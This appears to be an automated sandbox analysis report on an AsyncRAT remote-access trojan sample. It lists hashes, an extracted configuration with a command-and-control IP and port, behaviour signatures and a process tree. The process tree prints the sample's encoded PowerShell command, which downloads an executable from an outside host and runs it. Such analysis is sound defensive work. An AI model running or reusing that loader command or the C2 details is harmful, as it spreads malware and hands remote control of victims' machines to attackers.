Analysis

  • max time kernel
    165s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-12-2022 06:25

General

  • Target

    d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9.exe

  • Size

    6KB

  • MD5

    378deda0d1313deba917adfc74173962

  • SHA1

    cb466cdd64949febdaaae75625d5a3ce0fff6e35

  • SHA256

    d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9

  • SHA512

    c1411ed00aeb88b6f92702132d20dac2efacd90e79aee697e1e0431353638353a5f9fa6b575676e0426f1434cede0f59e58559822cc45067893a30f6b8300281

  • SSDEEP

    96:Ck79rll3VI2St01vk+Al5tONtUqvkC4muMs6d3oj0dirl:J9r/33SCvkRgNtUqvkBmm6dNdq

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    System Guard Runtime

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9.exe
    "C:\Users\Admin\AppData\Local\Temp\d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMgA0ADcANwA0ADEANwA2ADYAOAA4ADAAOAA3ADgANQAvADEAMAA0ADIANAA3ADcANQAwADYANAA4ADMAMQA5ADUAOQA2ADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGwAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdABqAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZABzAGYAZgBlADQAdgBiADUALgBlAHgAZQAnACkAKQA8ACMAZQB6AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgByAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGQAcwBmAGYAZQA0AHYAYgA1AC4AZQB4AGUAJwApADwAIwByAHMAawAjAD4A"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
        "C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4672
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:3896
    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      1⤵
      • Executes dropped EXE
      PID:3448

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dsffe4vb5.exe.log
      Filesize

      902B

      MD5

      317ed182314a105b8436cfd8bb3879f6

      SHA1

      aa407b44619a9b06b18d8a39ce27a65b959598e1

      SHA256

      34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

      SHA512

      27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      Filesize

      14.7MB

      MD5

      2cbd5d9d43c5c49f0580975e9e620808

      SHA1

      17e209b6d6c66882ed78a40d7e0d211760b489a0

      SHA256

      399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

      SHA512

      26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      Filesize

      14.7MB

      MD5

      2cbd5d9d43c5c49f0580975e9e620808

      SHA1

      17e209b6d6c66882ed78a40d7e0d211760b489a0

      SHA256

      399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

      SHA512

      26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      Filesize

      14.7MB

      MD5

      2cbd5d9d43c5c49f0580975e9e620808

      SHA1

      17e209b6d6c66882ed78a40d7e0d211760b489a0

      SHA256

      399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

      SHA512

      26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

    • memory/1428-140-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
      Filesize

      10.8MB

    • memory/1428-137-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
      Filesize

      10.8MB

    • memory/1428-136-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
      Filesize

      10.8MB

    • memory/1428-133-0x0000000000000000-mapping.dmp
    • memory/1428-134-0x000002DB63230000-0x000002DB63252000-memory.dmp
      Filesize

      136KB

    • memory/2108-132-0x0000000000920000-0x0000000000928000-memory.dmp
      Filesize

      32KB

    • memory/2108-135-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
      Filesize

      10.8MB

    • memory/3896-146-0x0000000000000000-mapping.dmp
    • memory/3896-148-0x00000000003A0000-0x00000000003B2000-memory.dmp
      Filesize

      72KB

    • memory/4672-144-0x0000000006110000-0x00000000061A2000-memory.dmp
      Filesize

      584KB

    • memory/4672-145-0x0000000006260000-0x00000000062FC000-memory.dmp
      Filesize

      624KB

    • memory/4672-143-0x0000000006510000-0x0000000006AB4000-memory.dmp
      Filesize

      5.6MB

    • memory/4672-142-0x0000000000190000-0x0000000001040000-memory.dmp
      Filesize

      14.7MB

    • memory/4672-138-0x0000000000000000-mapping.dmp